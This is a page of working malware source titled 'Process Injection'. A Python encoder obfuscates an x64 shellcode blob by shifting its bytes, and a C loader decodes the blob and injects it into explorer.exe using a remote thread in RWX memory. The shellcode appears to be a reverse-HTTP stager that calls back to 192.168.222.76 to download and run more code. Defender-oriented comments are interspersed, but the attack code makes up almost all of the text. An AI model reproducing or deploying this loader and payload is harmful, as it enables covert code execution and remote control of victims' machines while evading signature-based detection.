Process Injection

Python Encoder

import sys

payload = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x50\x00\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x69\x6d\x61\x67\x65\x36\x34\x2e\x67\x69\x66\x00\xf0\x5f\x50\x05\x2e\x79\xe2\x37\x4c\x50\xcc\xa2\x96\xbb\x15\x96\x0a\x26\x29\x23\x6f\xae\xdd\xab\xa6\x31\x74\xa8\xae\x81\x04\x5e\xc9\x10\xa2\xe6\x11\xe5\x74\xa0\x8d\x28\x9d\x12\xee\x47\x63\xda\x2f\x76\x2f\xc9\x78\x6b\x1d\x27\xb0\xf7\x36\x58\x09\x19\xe8\xc0\xba\xda\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\
x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x38\x39\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x38\x39\x2e\x30\x0d\x0a\x00\x97\x85\x83\x0e\xce\x35\x91\x7b\xe6\x5d\x6a\xe0\xae\x9a\xe7\xdc\xa8\x87\x7b\x4e\xf9\xf8\x12\xcd\x6e\xd8\x5e\x15\x52\x20\x50\x00\x0f\xfe\x84\xc5\x3b\x49\x49\x2d\xaf\x95\x76\x00\x41\xde\x47\x46\x71\x02\x2e\xb6\xea\x5c\xa9\xb5\x55\xcd\xf7\x18\x5d\x5f\x40\xfb\xfe\x17\xa9\x5f\x9e\x28\xd9\x02\xa5\xc7\x9a\xde\xc4\x44\x00\x03\x42\x05\x97\x8b\xb4\xbe\x48\x14\xe1\x9a\xd9\x1a\xf2\xa3\x54\x47\xda\x5e\x8a\x97\x0c\x6e\x63\xbb\xa4\xc3\x59\x51\xbf\xd4\xfd\x36\x2b\xcd\x25\x26\x9f\xc8\xd5\x82\x80\xaa\x32\xf2\xae\x5e\x28\xce\x95\xca\x99\xe7\xce\x42\xdb\x4e\x6c\x6a\x34\xfe\x25\x3f\x26\x86\x0b\xa0\xc2\xfe\x35\x47\xdc\x86\x71\x22\x0f\xee\x4a\x86\x9b\xe2\xd1\x94\xb8\xa4\xa8\xb6\x9e\x1d\xea\x65\x36\xe9\x6b\x43\x95\xc4\x0a\xe1\x76\x4c\x00\x6c\x71\x1d\x0d\x60\xce\xaf\x56\xec\xd2\xf7\x7d\x9a\xa8\xb3\xeb\xf9\x79\xd3\x45\xf6\x11\xae\xce\x8e\xaf\xd3\xa3\xd8\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x28\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x32\x32\x2e\x37\x36\x00\x12\x34\x56\x78"

# Encoder half of a simple "add one" byte transform.  This is Python 2 code:
# `bytearray(str)` without an encoding and the `print` statements below only
# parse/run under 2.x.  Iterating a bytearray yields ints, which is what the
# comparisons below rely on.
original_payload = bytearray(payload)

new_payload = []
for opcode in original_payload:
    # 0xFF bytes are passed through unchanged; every other byte is incremented.
    # Values are plain Python ints here, so there is no 8-bit wraparound.
    if opcode == 255:
        new_opcode = opcode
    else:
        new_opcode = opcode + 0x01

    new_payload.append(new_opcode)
    print "opcode -> before:", opcode, ", after:", new_opcode

print "----------------------------------------------------------------------------"
print "New Data in Hex:"
# Emits a C-style "\xNN" string.  hex() is not zero-padded, so bytes below 0x10
# are printed as a single hex digit (e.g. "\x1"); the C loader on this page
# embeds the output in exactly that form.  Defender note: because the loader
# reverses the transform at runtime, the bytes on disk differ from the bytes
# that execute, which is why file-level signatures for the original payload
# do not match the encoded copy, while memory scanning sees the decoded form.
print "".join(["\\x{0}".format(hex(abs(i)).replace("0x", "")) for i in new_payload])

Malware Code

#include <windows.h>
#include <stdio.h>
#include <TlHelp32.h>
#include <iostream>

// Look up a process id by executable name using a Toolhelp32 snapshot.
//
// ProcessName: image file name to match (compared case-insensitively via
//              lstrcmpi against PROCESSENTRY32::szExeFile).
// Returns the th32ProcessID of the first matching entry, or 0 when no
// process matches.
//
// NOTE(review): the snapshot handle is not validated; CreateToolhelp32Snapshot
// returns INVALID_HANDLE_VALUE on failure, in which case Process32First fails
// and the function falls through to the "return 0" path.
DWORD MyGetProcessId(LPCTSTR ProcessName) // non-conflicting function name
{
    PROCESSENTRY32 pt;
    HANDLE hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    pt.dwSize = sizeof(PROCESSENTRY32); // required before Process32First
    if (Process32First(hsnap, &pt)) { // must call this first
        do {
            if (!lstrcmpi(pt.szExeFile, ProcessName)) {
                CloseHandle(hsnap); // release the snapshot on the success path too
                return pt.th32ProcessID;
            }
        } while (Process32Next(hsnap, &pt));
    }
    CloseHandle(hsnap); // close handle on failure
    return 0;
}

// Loader: decodes the embedded byte array and runs it inside explorer.exe
// using the classic remote-thread injection sequence
// OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread.
//
// Defender note: that exact API chain, issued by one process against another
// with PROCESS_ALL_ACCESS and a PAGE_EXECUTE_READWRITE allocation, is the
// textbook telemetry pattern for cross-process injection; EDR and ETW-based
// detections key on the sequence rather than on the payload bytes, which are
// only decoded in memory.
int main(int argc, char** argv) {

    // Target selection: first process whose image name is explorer.exe (see MyGetProcessId).
    DWORD process_id = MyGetProcessId(TEXT("explorer.exe"));
    printf("Process ID is %d\n", process_id);

    // Encoded payload as emitted by the Python encoder on this page (each
    // byte +1, 0xFF left as-is, un-padded "\xN" form for values below 0x10).
    // The literal is stored in a writable stack array so it can be decoded in place.
    unsigned char code[] = "\xfd\x49\x84\xe5\xf1\xe9\xc9\x1\x1\x1\x42\x52\x42\x51\x53\x52\x57\x49\x32\xd3\x66\x49\x8c\x53\x61\x49\x8c\x53\x19\x49\x8c\x53\x21\x49\x8c\x73\x51\x49\x10\xb8\x4b\x4b\x4e\x32\xca\x49\x32\xc1\xad\x3d\x62\x7d\x3\x2d\x21\x42\xc2\xca\xe\x42\x2\xc2\xe3\xee\x53\x42\x52\x49\x8c\x53\x21\x8c\x43\x3d\x49\x2\xd1\x67\x82\x79\x19\xc\x3\x76\x73\x8c\x81\x89\x1\x1\x1\x49\x86\xc1\x75\x68\x49\x2\xd1\x51\x8c\x49\x19\x45\x8c\x41\x21\x4a\x2\xd1\xe4\x57\x49\xff\xca\x42\x8c\x35\x89\x49\x2\xd7\x4e\x32\xca\x49\x32\xc1\xad\x42\xc2\xca\xe\x42\x2\xc2\x39\xe1\x76\xf2\x4d\x4\x4d\x25\x9\x46\x3a\xd2\x76\xd9\x59\x45\x8c\x41\x25\x4a\x2\xd1\x67\x42\x8c\xd\x49\x45\x8c\x41\x1d\x4a\x2\xd1\x42\x8c\x5\x89\x49\x2\xd1\x42\x59\x42\x59\x5f\x5a\x5b\x42\x59\x42\x5a\x42\x5b\x49\x84\xed\x21\x42\x53\xff\xe1\x59\x42\x5a\x5b\x49\x8c\x13\xea\x50\xff\xff\xff\x5e\x6b\x1\x4a\xbf\x78\x6a\x6f\x6a\x6f\x66\x75\x1\x42\x57\x4a\x8a\xe7\x4d\x8a\xf2\x42\xbb\x4d\x78\x27\x8\xff\xd6\x49\x32\xca\x49\x32\xd3\x4e\x32\xc1\x4e\x32\xca\x42\x51\x42\x51\x42\xbb\x3b\x57\x7a\xa8\xff\xd6\xec\x74\x5b\x49\x8a\xc2\x42\xb9\x51\x1\x1\x1\x4e\x32\xca\x42\x52\x42\x52\x6b\x4\x42\x52\x42\xbb\x58\x8a\xa0\xc7\xff\xd6\xec\x5a\x5c\x49\x8a\xc2\x49\x32\xd3\x4a\x8a\xd9\x4e\x32\xca\x53\x69\x1\x3\x41\x85\x53\x53\x42\xbb\xec\x56\x2f\x3c\xff\xd6\x49\x8a\xc7\x49\x84\xc4\x51\x6b\xb\x60\x49\x8a\xf2\x49\x8a\xdb\x4a\xc8\xc1\xff\xff\xff\xff\x4e\x32\xca\x53\x53\x42\xbb\x2e\x7\x19\x7c\xff\xd6\x86\xc1\x10\x86\x9e\x2\x1\x1\x49\xff\xd0\x10\x85\x8d\x2\x1\x1\xec\xd4\xea\xe5\x2\x1\x1\xe9\xa3\xff\xff\xff\x30\x6a\x6e\x62\x68\x66\x37\x35\x2f\x68\x6a\x67\x1\xf1\x60\x51\x6\x2f\x7a\xe3\x38\x4d\x51\xcd\xa3\x97\xbc\x16\x97\xb\x27\x2a\x24\x70\xaf\xde\xac\xa7\x32\x75\xa9\xaf\x82\x5\x5f\xca\x11\xa3\xe7\x12\xe6\x75\xa1\x8e\x29\x9e\x13\xef\x48\x64\xdb\x30\x77\x30\xca\x79\x6c\x1e\x28\xb1\xf8\x37\x59\xa\x1a\xe9\xc1\xbb\xdb\x1\x56\x74\x66\x73\x2e\x42\x68\x66\x6f\x75\x3b\x21\x4e\x70\x7b\x6a\x6d\x6d\x62\x30\x36\x2f\x31\x21\x29\x58\x6a\x6f\x65\x70\x78\x74\x21\x4f\x55\x
21\x32\x31\x2f\x31\x3c\x21\x58\x6a\x6f\x37\x35\x3c\x21\x79\x37\x35\x3c\x21\x73\x77\x3b\x39\x3a\x2f\x31\x2a\x21\x48\x66\x64\x6c\x70\x30\x33\x31\x32\x31\x31\x32\x31\x32\x21\x47\x6a\x73\x66\x67\x70\x79\x30\x39\x3a\x2f\x31\xe\xb\x1\x98\x86\x84\xf\xcf\x36\x92\x7c\xe7\x5e\x6b\xe1\xaf\x9b\xe8\xdd\xa9\x88\x7c\x4f\xfa\xf9\x13\xce\x6f\xd9\x5f\x16\x53\x21\x51\x1\x10\xff\x85\xc6\x3c\x4a\x4a\x2e\xb0\x96\x77\x1\x42\xdf\x48\x47\x72\x3\x2f\xb7\xeb\x5d\xaa\xb6\x56\xce\xf8\x19\x5e\x60\x41\xfc\xff\x18\xaa\x60\x9f\x29\xda\x3\xa6\xc8\x9b\xdf\xc5\x45\x1\x4\x43\x6\x98\x8c\xb5\xbf\x49\x15\xe2\x9b\xda\x1b\xf3\xa4\x55\x48\xdb\x5f\x8b\x98\xd\x6f\x64\xbc\xa5\xc4\x5a\x52\xc0\xd5\xfe\x37\x2c\xce\x26\x27\xa0\xc9\xd6\x83\x81\xab\x33\xf3\xaf\x5f\x29\xcf\x96\xcb\x9a\xe8\xcf\x43\xdc\x4f\x6d\x6b\x35\xff\x26\x40\x27\x87\xc\xa1\xc3\xff\x36\x48\xdd\x87\x72\x23\x10\xef\x4b\x87\x9c\xe3\xd2\x95\xb9\xa5\xa9\xb7\x9f\x1e\xeb\x66\x37\xea\x6c\x44\x96\xc5\xb\xe2\x77\x4d\x1\x6d\x72\x1e\xe\x61\xcf\xb0\x57\xed\xd3\xf8\x7e\x9b\xa9\xb4\xec\xfa\x7a\xd4\x46\xf7\x12\xaf\xcf\x8f\xb0\xd4\xa4\xd9\x1\x42\xbf\xf1\xb6\xa3\x57\xff\xd6\x49\x32\xca\xbb\x1\x1\x41\x1\x42\xb9\x1\x11\x1\x1\x42\xba\x41\x1\x1\x1\x42\xbb\x59\xa5\x54\xe6\xff\xd6\x49\x94\x54\x54\x49\x8a\xe8\x49\x8a\xf2\x49\x8a\xdb\x42\xb9\x1\x21\x1\x1\x4a\x8a\xfa\x42\xbb\x13\x97\x8a\xe3\xff\xd6\x49\x84\xc5\x21\x86\xc1\x75\xb7\x67\x8c\x8\x49\x2\xc4\x86\xc1\x76\xd8\x59\x59\x59\x49\x6\x29\x1\x1\x1\x51\xc4\xe9\xa0\xfe\xff\xff\x32\x3a\x33\x2f\x32\x37\x39\x2f\x33\x33\x33\x2f\x38\x37\x1\x13\x35\x57\x79";

    // In-place decode: the inverse of the Python encoder (0xFF kept, all
    // other bytes -1).  sizeof(code) - 1 skips the string literal's
    // terminating NUL.  The decoded bytes exist only in this process's memory
    // from this point on.
    int i;
    for (i = 0; i < sizeof(code) - 1; i++) {
        if (code[i] == 255) {
            code[i] = code[i]; // deliberate no-op: 0xFF is passed through
        }
        else {
            code[i] = code[i] - 0x01;
        }
    }

    HANDLE process_handle;
    LPVOID pointer_after_allocated;
    // Full-rights handle to the target; PROCESS_ALL_ACCESS on another process
    // is itself a notable audit event.
    process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);

    // Both branches only print; execution continues with whatever handle
    // value was returned (including NULL).
    if (process_handle == NULL) {
        puts("[-]Error while open the process\n");
    }
    else {
        puts("[+] Process Opened sucessfully\n");
    }

    // Remote RWX allocation (PAGE_EXECUTE_READWRITE) sized to the whole
    // array, NUL included.  Writable+executable private memory in a foreign
    // process is a high-signal indicator for memory scanners.
    pointer_after_allocated = VirtualAllocEx(process_handle, NULL, sizeof(code), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    // As above, the failure branch only logs; the NULL address is still used below.
    if (pointer_after_allocated == NULL) {
        puts("[-]Error while get the base address to write\n");
    }
    else {
        // "%x" prints an unsigned int; on 64-bit builds this truncates the pointer
        // (display only, does not affect the injection).
        printf("[+]Got the address to write 0x%x\n", pointer_after_allocated);
    }

    // Copy the decoded bytes into the remote allocation, then start a thread
    // at that address.  The thread handle returned by CreateRemoteThread is
    // not stored or closed; the stack size argument is the literal 100.
    if (WriteProcessMemory(process_handle, (LPVOID)pointer_after_allocated, (LPCVOID)code, sizeof(code), 0)) {
        puts("[+]Happened\n");
        puts("[+]Running the code as new thread !\n");
        CreateRemoteThread(process_handle, NULL, 100, (LPTHREAD_START_ROUTINE)pointer_after_allocated, NULL, NULL, 0);
    }
    else {
        puts("Not Happened\n");
    }
    // process_handle is never closed; main has no explicit return (C++ implies 0).
}
